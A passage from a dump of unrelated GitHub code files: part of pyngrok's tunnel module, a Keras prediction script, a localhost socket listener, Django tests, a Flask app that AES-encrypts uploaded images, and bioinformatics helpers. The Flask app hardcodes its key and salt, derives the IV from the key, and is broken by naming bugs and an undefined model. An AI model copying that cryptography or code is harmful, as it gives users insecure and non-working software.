``http`` and one ``https``. This method will return a reference to the ``http`` tunnel in this case. If\n only a single tunnel is needed, pass ``bind_tls=True`` and a reference to the ``https`` tunnel will be returned.\n\n :param addr: The local port to which the tunnel will forward traffic, or a\n `local directory or network address `_, defaults to \"80\".\n :param proto: A valid `tunnel protocol\n `_, defaults to \"http\".\n :param name: A friendly name for the tunnel, or the name of a `ngrok tunnel definition `_\n to be used.\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n :param options: Remaining ``kwargs`` are passed as `configuration for the ngrok\n tunnel `_.\n :return: The created ``ngrok`` tunnel.\n \"\"\"\n if \"labels\" in options:\n raise PyngrokError(\"\\\"labels\\\" cannot be passed to connect(), define a tunnel definition in the config file.\")\n\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n config_path = conf.get_config_path(pyngrok_config)\n\n if os.path.exists(config_path):\n config = installer.get_ngrok_config(config_path, ngrok_version=pyngrok_config.ngrok_version)\n else:\n config = get_default_config(pyngrok_config.ngrok_version)\n\n tunnel_definitions = config.get(\"tunnels\", {})\n # If a \"pyngrok-default\" tunnel definition exists in the ngrok config, use that\n if not name and \"pyngrok-default\" in tunnel_definitions:\n name = \"pyngrok-default\"\n\n # Use a tunnel definition for the given name, if it exists\n if name and name in tunnel_definitions:\n tunnel_definition = tunnel_definitions[name]\n\n if \"labels\" in tunnel_definition and \"bind_tls\" in options:\n raise PyngrokError(\"\\\"bind_tls\\\" cannot be set when \\\"labels\\\" is also on the tunnel definition.\")\n\n addr = tunnel_definition.get(\"addr\") if not addr else addr\n proto = tunnel_definition.get(\"proto\") if not proto else proto\n # Use the tunnel definition as the base, but override with any passed in options\n tunnel_definition.update(options)\n options = tunnel_definition\n\n if \"labels\" in options and not pyngrok_config.api_key:\n raise PyngrokError(\n \"\\\"PyngrokConfig.api_key\\\" must be set when \\\"labels\\\" is on the tunnel definition.\")\n\n addr = str(addr) if addr else \"80\"\n # Only apply a default proto label if \"labels\" isn't defined\n if not proto and \"labels\" not in options:\n proto = \"http\"\n\n if not name:\n if not addr.startswith(\"file://\"):\n name = \"{}-{}-{}\".format(proto, addr, uuid.uuid4())\n else:\n name = \"{}-file-{}\".format(proto, uuid.uuid4())\n\n logger.info(\"Opening tunnel named: {}\".format(name))\n\n config = {\n \"name\": name,\n \"addr\": addr\n }\n options.update(config)\n\n # Only apply proto when \"labels\" is not defined\n if \"labels\" not in options:\n options[\"proto\"] = proto\n\n # Upgrade legacy parameters, if present\n if pyngrok_config.ngrok_version == \"v3\":\n if \"bind_tls\" in options:\n if options.get(\"bind_tls\") is True or options.get(\"bind_tls\") == \"true\":\n options[\"schemes\"] = [\"https\"]\n elif not options.get(\"bind_tls\") is not False or options.get(\"bind_tls\") == \"false\":\n options[\"schemes\"] = [\"http\"]\n else:\n options[\"schemes\"] = [\"http\", \"https\"]\n\n options.pop(\"bind_tls\")\n\n if \"auth\" in options:\n auth = options.get(\"auth\")\n if isinstance(auth, list):\n options[\"basic_auth\"] = auth\n else:\n options[\"basic_auth\"] = [auth]\n\n options.pop(\"auth\")\n\n api_url = get_ngrok_process(pyngrok_config).api_url\n\n logger.debug(\"Creating tunnel with options: {}\".format(options))\n\n tunnel = NgrokTunnel(api_request(\"{}/api/tunnels\".format(api_url), method=\"POST\", data=options,\n timeout=pyngrok_config.request_timeout),\n pyngrok_config, api_url)\n\n if pyngrok_config.ngrok_version == \"v2\" and proto == \"http\" and options.get(\"bind_tls\", \"both\") == \"both\":\n tunnel = NgrokTunnel(api_request(\"{}{}%20%28http%29\".format(api_url, tunnel.uri), method=\"GET\",\n timeout=pyngrok_config.request_timeout),\n pyngrok_config, api_url)\n\n _apply_cloud_edge_to_tunnel(tunnel, pyngrok_config)\n\n if tunnel.public_url is None:\n raise PyngrokError(\n \"\\\"public_url\\\" was not populated for tunnel {}, but is required for pyngrok to function.\".format(\n tunnel))\n\n _current_tunnels[tunnel.public_url] = tunnel\n\n return tunnel\n\n\ndef disconnect(public_url: str,\n pyngrok_config: Optional[PyngrokConfig] = None) -> None:\n \"\"\"\n Disconnect the ``ngrok`` tunnel for the given URL, if open.\n\n :param public_url: The public URL of the tunnel to disconnect.\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n # If ngrok is not running, there are no tunnels to disconnect\n if not process.is_process_running(pyngrok_config.ngrok_path):\n return\n\n api_url = get_ngrok_process(pyngrok_config).api_url\n\n if public_url not in _current_tunnels:\n get_tunnels(pyngrok_config)\n\n # One more check, if the given URL is still not in the list of tunnels, it is not active\n if public_url not in _current_tunnels:\n return\n\n tunnel = _current_tunnels[public_url]\n\n logger.info(\"Disconnecting tunnel: {}\".format(tunnel.public_url))\n\n api_request(\"{}{}\".format(api_url, tunnel.uri), method=\"DELETE\",\n timeout=pyngrok_config.request_timeout)\n\n _current_tunnels.pop(public_url, None)\n\n\ndef get_tunnels(pyngrok_config: Optional[PyngrokConfig] = None) -> List[NgrokTunnel]:\n \"\"\"\n Get a list of active ``ngrok`` tunnels for the given config's ``ngrok_path``.\n\n If ``ngrok`` is not installed at :class:`~pyngrok.conf.PyngrokConfig`'s ``ngrok_path``, calling this method\n will first download and install ``ngrok``.\n\n If ``ngrok`` is not running, calling this method will first start a process with\n :class:`~pyngrok.conf.PyngrokConfig`.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n :return: The active ``ngrok`` tunnels.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n api_url = get_ngrok_process(pyngrok_config).api_url\n\n _current_tunnels.clear()\n for tunnel in api_request(\"{}/api/tunnels\".format(api_url), method=\"GET\",\n timeout=pyngrok_config.request_timeout)[\"tunnels\"]:\n ngrok_tunnel = NgrokTunnel(tunnel, pyngrok_config, api_url)\n _apply_cloud_edge_to_tunnel(ngrok_tunnel, pyngrok_config)\n\n if ngrok_tunnel.public_url is None:\n raise PyngrokError(\n \"\\\"public_url\\\" was not populated for tunnel {}, but is required for pyngrok to function.\".format(\n ngrok_tunnel))\n\n _current_tunnels[ngrok_tunnel.public_url] = ngrok_tunnel\n\n return list(_current_tunnels.values())\n\n\ndef kill(pyngrok_config: Optional[PyngrokConfig] = None) -> None:\n \"\"\"\n Terminate the ``ngrok`` processes, if running, for the given config's ``ngrok_path``. This method will not\n block, it will just issue a kill request.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n process.kill_process(pyngrok_config.ngrok_path)\n\n _current_tunnels.clear()\n\n\ndef get_version(pyngrok_config: Optional[PyngrokConfig] = None) -> Tuple[str, str]:\n \"\"\"\n Get a tuple with the ``ngrok`` and ``pyngrok`` versions.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n :return: A tuple of ``(ngrok_version, pyngrok_version)``.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n ngrok_version = process.capture_run_process(pyngrok_config.ngrok_path, [\"--version\"]).split(\"version \")[1]\n\n return ngrok_version, __version__\n\n\ndef update(pyngrok_config: Optional[PyngrokConfig] = None) -> str:\n \"\"\"\n Update ``ngrok`` for the given config's ``ngrok_path``, if an update is available.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n :return: The result from the ``ngrok`` update.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n return process.capture_run_process(pyngrok_config.ngrok_path, [\"update\"])\n\n\ndef api_request(url: str,\n method: str = \"GET\",\n data: Optional[Dict[str, Any]] = None,\n params: Optional[Dict[str, Any]] = None,\n timeout: float = 4,\n auth: Optional[str] = None) -> Dict[str, Any]:\n \"\"\"\n Invoke an API request to the given URL, returning JSON data from the response.\n\n One use for this method is making requests to ``ngrok`` tunnels:\n\n .. code-block:: python\n\n from pyngrok import ngrok\n\n public_url = ngrok.connect()\n response = ngrok.api_request(\"{}/some-route\".format(public_url),\n method=\"POST\", data={\"foo\": \"bar\"})\n\n Another is making requests to the ``ngrok`` API itself:\n\n .. code-block:: python\n\n from pyngrok import ngrok\n\n api_url = ngrok.get_ngrok_process().api_url\n response = ngrok.api_request(\"{}/api/requests/http\".format(api_url),\n params={\"tunnel_name\": \"foo\"})\n\n :param url: The request URL.\n :param method: The HTTP method.\n :param data: The request body.\n :param params: The URL parameters.\n :param timeout: The request timeout, in seconds.\n :param auth: Set as Bearer for an Authorization header.\n :return: The response from the request.\n \"\"\"\n if params is None:\n params = {}\n\n if not url.lower().startswith(\"http\"):\n raise PyngrokSecurityError(\"URL must start with \\\"http\\\": {}\".format(url))\n\n encoded_data = json.dumps(data).encode(\"utf-8\") if data else None\n\n if params:\n url += \"?{}\".format(urlencode([(x, params[x]) for x in params]))\n\n request = Request(url, method=method.upper())\n request.add_header(\"Content-Type\", \"application/json\")\n if auth:\n request.add_header(\"Ngrok-Version\", \"2\")\n request.add_header(\"Authorization\", \"Bearer {}\".format(auth))\n\n logger.debug(\"Making {} request to {} with data: {}\".format(method, url, data))\n\n try:\n response = urlopen(request, encoded_data, timeout)\n response_data = response.read().decode(\"utf-8\")\n\n status_code = response.getcode()\n logger.debug(\"Response {}: {}\".format(status_code, response_data.strip()))\n\n if str(status_code)[0] != \"2\":\n raise PyngrokNgrokHTTPError(\"ngrok client API returned {}: {}\".format(status_code, response_data), url,\n status_code, None, request.headers, response_data)\n elif status_code == HTTPStatus.NO_CONTENT:\n return {}\n\n return json.loads(response_data)\n except socket.timeout:\n raise PyngrokNgrokURLError(\"ngrok client exception, URLError: timed out\", \"timed out\")\n except HTTPError as e:\n response_data = e.read().decode(\"utf-8\")\n\n status_code = e.getcode()\n logger.debug(\"Response {}: {}\".format(status_code, response_data.strip()))\n\n raise PyngrokNgrokHTTPError(\"ngrok client exception, API returned {}: {}\".format(status_code, response_data),\n e.url,\n status_code, e.reason, e.headers, response_data)\n except URLError as e:\n raise PyngrokNgrokURLError(\"ngrok client exception, URLError: {}\".format(e.reason), e.reason)\n\n\ndef run(args: Optional[List[str]] = None,\n pyngrok_config: Optional[PyngrokConfig] = None) -> None:\n \"\"\"\n Ensure ``ngrok`` is installed at the default path, then call :func:`~pyngrok.process.run_process`.\n\n This method is meant for interacting with ``ngrok`` from the command line and is not necessarily\n compatible with non-blocking API methods. For that, use :mod:`~pyngrok.ngrok`'s interface methods (like\n :func:`~pyngrok.ngrok.connect`), or use :func:`~pyngrok.process.get_process`.\n\n :param args: Arguments to be passed to the ``ngrok`` process.\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n \"\"\"\n if args is None:\n args = []\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n install_ngrok(pyngrok_config)\n\n process.run_process(pyngrok_config.ngrok_path, args)\n\n\ndef main() -> None:\n \"\"\"\n Entry point for the package's ``console_scripts``. This initializes a call from the command\n line and invokes :func:`~pyngrok.ngrok.run`.\n\n This method is meant for interacting with ``ngrok`` from the command line and is not necessarily\n compatible with non-blocking API methods. For that, use :mod:`~pyngrok.ngrok`'s interface methods (like\n :func:`~pyngrok.ngrok.connect`), or use :func:`~pyngrok.process.get_process`.\n \"\"\"\n run(sys.argv[1:])\n\n if len(sys.argv) == 1 or len(sys.argv) == 2 and sys.argv[1].lstrip(\"-\").lstrip(\"-\") == \"help\":\n print(\"\\nPYNGROK VERSION:\\n {}\".format(__version__))\n elif len(sys.argv) == 2 and sys.argv[1].lstrip(\"-\").lstrip(\"-\") in [\"v\", \"version\"]:\n print(\"pyngrok version {}\".format(__version__))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alexdlaird/pyngrok","sub_path":"pyngrok/ngrok.py","file_name":"ngrok.py","file_ext":"py","file_size_in_byte":23923,"program_lang":"python","lang":"en","doc_type":"code","stars":374,"dataset":"github-code","pt":"53"} +{"seq_id":"25536085202","text":"\"\"\"\nMultiprocessing using python\n\"\"\"\nfrom multiprocessing import Process\n\n\ndef print_func(value='default_value'):\n print(f\"This function print {value}\")\n\n\nif __name__ == '__main__':\n names = ['chetan', 'vinay', 'parth']\n procs = []\n proc = Process(target=print_func) # instantiating without any argument\n procs.append(proc)\n proc.start()\n\n # instantiating process with arguments\n for name in names:\n # print(name)\n proc = Process(target=print_func, args=(name,))\n procs.append(proc)\n proc.start()\n\n # complete the processes\n for proc in procs:\n proc.join()\n\n\n\"\"\"\nOutput:\nThis function print default_value\nThis function print chetan\nThis function print vinay\nThis function print parth\n\"\"\"","repo_name":"chetanghadawaje/pythonBasic","sub_path":"Multiprocessing/basic_multiprocessing.py","file_name":"basic_multiprocessing.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31151115920","text":"from keras.models import load_model\nfrom keras.preprocessing.image import ImageDataGenerator\nimport pandas as pd\nimport numpy as np\n\nIMG_SIZE = 224\nBATCH_SIZE = 64\n\ndatagen = ImageDataGenerator(rescale=1.0/255)\ntest_gen_s1 = datagen.flow_from_directory('test_data/s1/',\n\t\t\t\t\ttarget_size = (IMG_SIZE,IMG_SIZE),\n\t\t\t\t\tbatch_size = BATCH_SIZE,\n\t\t\t\t\tclass_mode='categorical')\ntest_gen_s2 = datagen.flow_from_directory('test_data/s2/',\n target_size = (IMG_SIZE,IMG_SIZE),\n batch_size = BATCH_SIZE,\n class_mode='categorical')\nmodel_1 = load_model('vgg_model_best_1.h5')\nmodel_2 = load_model('vgg_model_best_2.h5')\nprint('model loaded')\nsteps_ = (39794//2) // BATCH_SIZE\npredictions_s1 = model_1.predict_generator(test_gen_s1,steps = steps_+1,verbose = 1)\nprint(predictions_s1.shape)\n\npredictions_s2 = model_2.predict_generator(test_gen_s2,steps = steps_+1,verbose = 1)\nprint(predictions_s2.shape)\nnp.save('predictions_s1.npy',predictions_s1)\nnp.save('predictions_s2.npy',predictions_s2)\n\nfilenames_1 = test_gen_s1.filenames\nfilenames_2 = test_gen_s2.filenames\n\ndf = pd.DataFrame()\ndf['filename_s1'] = filenames_1\ndf['prediction_s1'] = predictions_s1\ndf['filename_s2'] = filenames_2\ndf['prediction_s2'] = predictions_s2\ndf.to_csv('predictions_ensemble.csv',index =False)\n","repo_name":"RamjiB/Recursive-Cellular-Image-Classification","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34188402990","text":"import socket\r\nimport time\r\n\r\nHOST = '127.0.0.1'\r\nPORT = 5000\r\n\r\ndef main():\r\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\r\n s.bind((HOST, PORT))\r\n s.listen()\r\n print(f\"Listening on port {PORT}...\")\r\n conn, addr = s.accept()\r\n with conn:\r\n print('Connected by', addr)\r\n while True:\r\n data = conn.recv(1024)\r\n if not data:\r\n break\r\n message = data.decode()\r\n if message == \"stop\":\r\n print(\"Received stop message. Stopping machine...\")\r\n break\r\n else:\r\n print(f\"Received unknown message: {message}\")\r\n\r\nwhile True:\r\n main()\r\n time.sleep(1)\r\n","repo_name":"D3ATHWI3H/ML-Cnc-Tool-Crack","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15638152229","text":"from datetime import date\n\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import FieldError\n\nfrom clone.models import (\n Attendence\n)\n\n\nclass DatesTest(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.user = User.objects.create(\n username='admin', email=\"admin@gmail.com\", first_name=\"harshit\", last_name=\"chandani\")\n cls.user.set_password(\"admin\")\n cls.user.save()\n\n def setUp(self):\n Attendence.objects.create(\n user=self.user,\n date=\"2022-06-17\",\n checkin_time=\"10:07:46\",\n checkout_time=\"18:41:08\",\n ttl_work_time=\"08:33:22\"\n )\n Attendence.objects.create(\n user=self.user,\n date=\"2022-06-16\",\n checkin_time=\"10:07:46\",\n checkout_time=\"17:41:08\",\n ttl_work_time=\"07:33:22\"\n )\n\n def test_attendence_dates(self):\n self.assertSequenceEqual(\n Attendence.objects.dates('date', \"year\"),\n [\n date(2022, 1, 1)\n ]\n )\n\n self.assertSequenceEqual(\n Attendence.objects.dates(\"date\", \"month\"),\n [\n date(2022, 6, 1)\n ]\n )\n self.assertSequenceEqual(\n Attendence.objects.dates(\"date\", \"day\"),\n [\n date(2022, 6, 16),\n date(2022, 6, 17)\n ]\n )\n\n def test_attendence_dates_fails_when_given_invalid_field_argument(self):\n with self.assertRaisesMessage(\n FieldError,\n 'Cannot resolve keyword \"invalid_field\" into field.'\n ):\n Attendence.objects.dates('invalid_field', 'year')\n\n def test_attendence_dates_fails_when_given_invalid_kind_argument(self):\n\n with self.assertRaisesMessage(ValueError, \" 'kind' must be of 'year','month','day' \"):\n Attendence.objects.dates('date', 'bad_kind')\n\n\n","repo_name":"HarshitChandani/zoho-clone","sub_path":"zoho/clone/tests/models/attendence.py","file_name":"attendence.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13436137060","text":"import os\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom PIL import Image\r\nimport cv2\r\nfrom tensorflow.keras.models import load_model\r\nfrom flask import Flask, request, render_template\r\nfrom werkzeug.utils import secure_filename\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport sys\r\nimport cv2\r\nimport numpy as np\r\nfrom Crypto.Cipher import AES\r\nfrom Crypto.Util.Padding import pad, unpad\r\nfrom Crypto.Random import get_random_bytes\r\nfrom Crypto.Protocol.KDF import PBKDF2\r\nfrom Crypto.Hash import SHA256\r\n\r\nkeyInput = \"MySecretKey123\"\r\nsalt = b'MyFixedSalt123'\r\nkeySize = 16\r\nivSize = AES.block_size\r\n\r\n\r\napp = Flask(__name__)\r\n\r\nmodel = load_model('brain_tumor_classification_VGG16.h5')\r\n# model1 = load_model('brain21.h5')\r\n\r\ndef get_className(classNo1):\r\n if classNo1 == 1:\r\n return \"Brain tumor\"\r\n elif classNo1 == 2:\r\n return \"Not a brain tumor\"\r\n elif classNo1 == 3:\r\n return \"Not a brain image\"\r\n \r\n \r\ndef encrypt(file_path):\r\n \r\n\r\n start_time = time.time()\r\n \r\n imageOrig = cv2.imread(file_path)\r\n rowOrig, columnOrig, depthOrig = imageOrig.shape\r\n\r\n minWidth = (AES.block_size + AES.block_size) // depthOrig + 1\r\n if columnOrig < minWidth:\r\n print('The minimum width of the image must be {} pixels, so that IV and padding can be stored in a single additional row!'.format(minWidth))\r\n sys.exit()\r\n\r\n imageOrigBytes = imageOrig.tobytes()\r\n \r\n key = PBKDF2(keyInput, salt, dkLen=16)\r\n\r\n hash_obj = SHA256.new(key)\r\n iv = hash_obj.digest()[:ivSize]\r\n\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n imageOrigBytesPadded = pad(imageOrigBytes, AES.block_size)\r\n ciphertext = cipher.encrypt(imageOrigBytesPadded)\r\n\r\n paddedSize = len(imageOrigBytesPadded) - len(imageOrigBytes)\r\n void = columnOrig * depthOrig - ivSize - paddedSize\r\n ivCiphertextVoid = iv + ciphertext + bytes(void)\r\n imageEncrypted = np.frombuffer(ivCiphertextVoid, dtype=imageOrig.dtype).reshape(rowOrig + 1, columnOrig, depthOrig)\r\n\r\n cv2.imwrite(file_path, imageEncrypted)\r\n cv2.destroyAllWindows()\r\n\r\ndef decrypt(file_path):\r\n\r\n key = PBKDF2(keyInput, salt, dkLen=16)\r\n \r\n hash_obj = SHA256.new(key)\r\n iv = hash_obj.digest()[:ivSize]\r\n \r\n imageEncrypted = cv2.imread(file_path)\r\n \r\n rowEncrypted, columnOrig, depthOrig = imageEncrypted.shape\r\n rowOrig = rowEncrypted - 1\r\n encryptedBytes = imageEncrypted.tobytes()\r\n iv = encryptedBytes[:ivSize]\r\n imageOrigBytesSize = rowOrig * columnOrig * depthOrig\r\n paddedSize = (imageOrigBytesSize // AES.block_size + 1) * AES.block_size - imageOrigBytesSize\r\n encrypted = encryptedBytes[ivSize: ivSize + imageOrigBytesSize + paddedSize]\r\n \r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n decryptedImageBytesPadded = cipher.decrypt(encrypted)\r\n decryptedImageBytes = unpad(decryptedImageBytesPadded, AES.block_size)\r\n \r\n decryptedImage = np.frombuffer(decryptedImageBytes, imageEncrypted.dtype).reshape(rowOrig, columnOrig, depthOrig)\r\n\r\n cv2.imwrite(\"decrypted_image.png\", decryptedImage)\r\n cv2.destroyAllWindows()\r\n return decryptedImage\r\n\r\n\r\ndef getResult(img):\r\n # image = cv2.imread(img)\r\n image = decrypt(img)\r\n image = Image.fromarray(image, 'RGB')\r\n image = image.resize((224, 224))\r\n image = np.array(image)\r\n input_img = np.expand_dims(image, axis=0)\r\n predict_x = model1.predict(input_img)\r\n result = np.argmax(predict_x, axis=1)\r\n print(result)\r\n if result == 0:\r\n predict_y = model.predict(input_img)\r\n output = np.argmax(predict_y, axis=1)\r\n print(output)\r\n if output == 1:\r\n return 1\r\n else:\r\n return 2\r\n else:\r\n return 3\r\n\r\n@app.route('/', methods=['GET'])\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef upload():\r\n if request.method == 'POST':\r\n f = request.files['file']\r\n basepath = os.path.dirname(_file_)\r\n \r\n filename=\"gfgfhf.png\"\r\n file_path = os.path.join(basepath, 'uploads', filename)\r\n f.save(file_path)\r\n encrypt(file_path)\r\n \r\n value = getResult(file_path)\r\n \r\n res = get_className(value)\r\n return res\r\n\r\n else:\r\n value = getResult(file_path)\r\n output = get_className(value)\r\n return output\r\n\r\nif __name__ == '_main_':\r\n app.run(port=3000, debug=False)","repo_name":"greeksachdeva/AES-IMAGE-PYTHON","sub_path":"Flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35588833196","text":"from collections import deque\n \ndef solution(places):\n \n def bfs(x,y,graph):\n visit = [[0]*5 for _ in range(5)]\n visit[x][y] = 0\n dx = [1,0,-1,0]\n dy = [0,1,0,-1]\n q = deque([(x,y)]) \n\n while q:\n x,y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx<5 and 0<=ny<5 and not visit[nx][ny] and graph[nx][ny] != 'X':\n visit[nx][ny] = visit[x][y] + 1 # 탐색한 거리가 맨하탄거리!\n q.append((nx,ny))\n\n return visit # 탐색한 거리를 리턴\n\n answer = []\n n = 5\n for graph in places:\n plist = []\n for i in range(n):\n for j in range(n):\n if graph[i][j] == 'P': # P의 위치들 기록\n plist.append((i,j)) \n \n isTrue = True # 거리두기 만족 여부\n for i in range(len(plist)): # 하나의 P에 대해서\n if isTrue: \n for j in range(i+1,len(plist)): # 나머지 P들의 맨하탄거리 구하기\n x,y = plist[i]\n x2,y2 = plist[j]\n result = bfs(x,y,graph)\n if 1<=result[x2][y2]<=2: # 나머지P들 중 하나라도 맨하탄 거리가 1이상 2이하면, (0은 완전 막혀서 못간것이므로 조건만족임)\n isTrue = False\n break\n else: # 하나라도 거리두기 불만족 시\n break \n\n if isTrue:\n answer.append(1)\n else:\n answer.append(0)\n \n return answer","repo_name":"agilestar8/coding-test-","sub_path":"프로그래머스 lv2/거리두기 확인하기.py","file_name":"거리두기 확인하기.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39577309536","text":"\"\"\"\nTests for :mod:`ranger-ims-server.ext.klein`\n\"\"\"\n\nfrom klein import KleinRenderable\nfrom klein.test.test_resource import Klein, MockRequest\nfrom twisted.web.iweb import IRequest\n\nfrom ..klein import static\nfrom ..trial import TestCase\n\n\n__all__ = ()\n\n\nclass StaticDecoratorTests(TestCase):\n \"\"\"\n Tests for :func:`static`\n \"\"\"\n\n class Application:\n router = Klein()\n\n hello = \"Hello\"\n\n @router.route(\"/\")\n @static\n def root(self, request: IRequest) -> KleinRenderable:\n return self.hello\n\n def test_static_entity(self) -> None:\n \"\"\"\n :func:`static` returns the entity returned by the wrapped method.\n \"\"\"\n app = self.Application()\n request = MockRequest(b\"/\")\n\n entity = app.root(request)\n\n self.assertIdentical(entity, app.hello)\n\n def test_static_etag(self) -> None:\n \"\"\"\n :func:`static` sets an ``ETag`` header.\n \"\"\"\n app = self.Application()\n request = MockRequest(b\"/\")\n\n app.root(request)\n\n etags = request.responseHeaders.getRawHeaders(\"etag\")\n self.assertTrue(len(etags) == 1, etags)\n etag = etags[0]\n self.assertTrue(etag)\n\n def test_static_cacheControl(self) -> None:\n \"\"\"\n :func:`static` sets a ``Cache-Control`` header.\n \"\"\"\n app = self.Application()\n request = MockRequest(b\"/\")\n\n app.root(request)\n\n etags = request.responseHeaders.getRawHeaders(\"cache-control\")\n self.assertTrue(len(etags) == 1, etags)\n etag = etags[0]\n self.assertTrue(etag)\n","repo_name":"burningmantech/ranger-ims-server","sub_path":"src/ims/ext/test/test_klein.py","file_name":"test_klein.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"10035665020","text":"# region CHARGING STATION: The Frequency Array\nimport itertools\n#counts how many times certain pattern is observed in the sequence\ndef pattern_count(text, pattern):\n count = 0\n for i in range(0, len(text) - len(pattern) + 1):\n if text[i : len(pattern) + i] == pattern:\n count += 1\n return count\n\n\ntext1 = \"GACCATCAAAACTGATAAACTACTTAAAAATCAGT\"\npattern1 = \"AAA\"\n#print (pattern_count(text1, pattern1))\n\n#FrequentWords is shown below.,http://ideone.com/fork/A2kahh\n#https://ideone.com/fork/LrznON\ndef frequentwords(text, k):\n frequentpatterns, count = [], []\n for i in range(len(text) - k + 1):\n count.append(pattern_count(text, text[i:i+k]))\n maxCount = max(count)\n for i in range(len(count)):\n if count[i] == maxCount:\n frequentpatterns.append(text[i:i+k])\n return set(frequentpatterns)\ntext= \"CGCCTAAATAGCCTCGCGGAGCCTTATGTCATACTCGTCCT\"\nk= 3\n\n#print(frequentwords(text, k))\n\n#function to reverse complement of the string\ndef reversecomplement(text):\n base = ['A', 'C', 'G', 'T']\n # print (list(reversed(base)))\n #print((base.index('C')))\n #print(list(reversed(base))[base.index('C')])\n result = [list(reversed(base))[base.index(ch)] for ch in reversed(text)]\n return ''.join(result)\n\ntext2='CCAGATC'\n\n\nf = open('myfile','w')\nf.write(reversecomplement(text2)) # python will convert \\n to os.linesep\nf.close() # you can omit in most cases as the destructor will call it\n#print (reversecomplement(text2))\n\n\n#pattern matching, all positions where the pattern starts\ndef substr(pattern, genome):\n k, result = len(pattern), []\n for i in range(len(genome) - k + 1):\n if genome[i:i+k] == pattern:\n result.append(i)\n #import string\n #string.join( result, '(*)' )\n return result\n\npattern ='CTTGATCAT'\ngenome ='aa'\n#print(*substr(pattern, genome), sep=' ')\n\ndef patterntonumber(pattern):\n patterns = [''.join(x) for x in itertools.product(['A', 'C', 'G', 'T'], repeat=len(pattern))]\n return patterns.index(pattern)\n\ndef numbertopattern(number, k):\n patterns = [''.join(x) for x in itertools.product(['A', 'C', 'G', 'T'], repeat=k)]\n return patterns[number]\n\ndef findclump(genome1, k, l, t):\n result = set()\n for i in range(len(genome1) - l + 1):\n wordsrange = range(l - k + 1)\n index, count = [patterntonumber(genome1[i+j:i+j+k]) for j in wordsrange], [1 for j in wordsrange]\n index.sort()\n for j in range(1, l - k + 1):\n if index[j] == index[j - 1]:\n count[j] = count[j - 1] + 1\n for j in wordsrange:\n if count[j] >= t:\n result.add(numbertopattern(index[j], k))\n return result\n\ndef ClumpFinding(Text, k, L, t):\n \"\"\"Clump Finding Problem: Find patterns forming clumps in a string.\n Input: A string Genome, and integers k (frequent k-mers), L (cluster/clumps length), and t (time/count).\n Output: All distinct k-mers forming (L, t)-clumps in Genome.\n \"\"\"\n FrequentPatterns=[]\n for n in range (0,(len(Text)-L)):\n Text_L=Text[n:(n+L)]\n for i in range(0,(len(Text_L)-k)):\n Pattern = Text[i:(i+k)]\n count=PatternCount(Text_L, Pattern)\n if count == t:\n FrequentPatterns.append(Text[i:(i+k)]) #add Text(i, k) to FrequentPatterns\n FrequentPatterns=list(set(FrequentPatterns)) #remove duplicates from FrequentPatterns\n return FrequentPatterns\n\n\ndef PatternCount(Text, Pattern):\n \"\"\"\"The pattern of the motif for the mismatches,\n The input Text is a string and Pattern is also a string\n \"\"\"\n count= 0\n for i in range (0,(len(Text)-len(Pattern))):\n if Text[i:(i+len(Pattern))] == Pattern:\n count=count+1\n return count\n\n#example\nText=\"yyyyyyyyyyyyyyy\"\n\nk=10\nL=514\nt=20\nprint (ClumpFinding(Text, k, L, 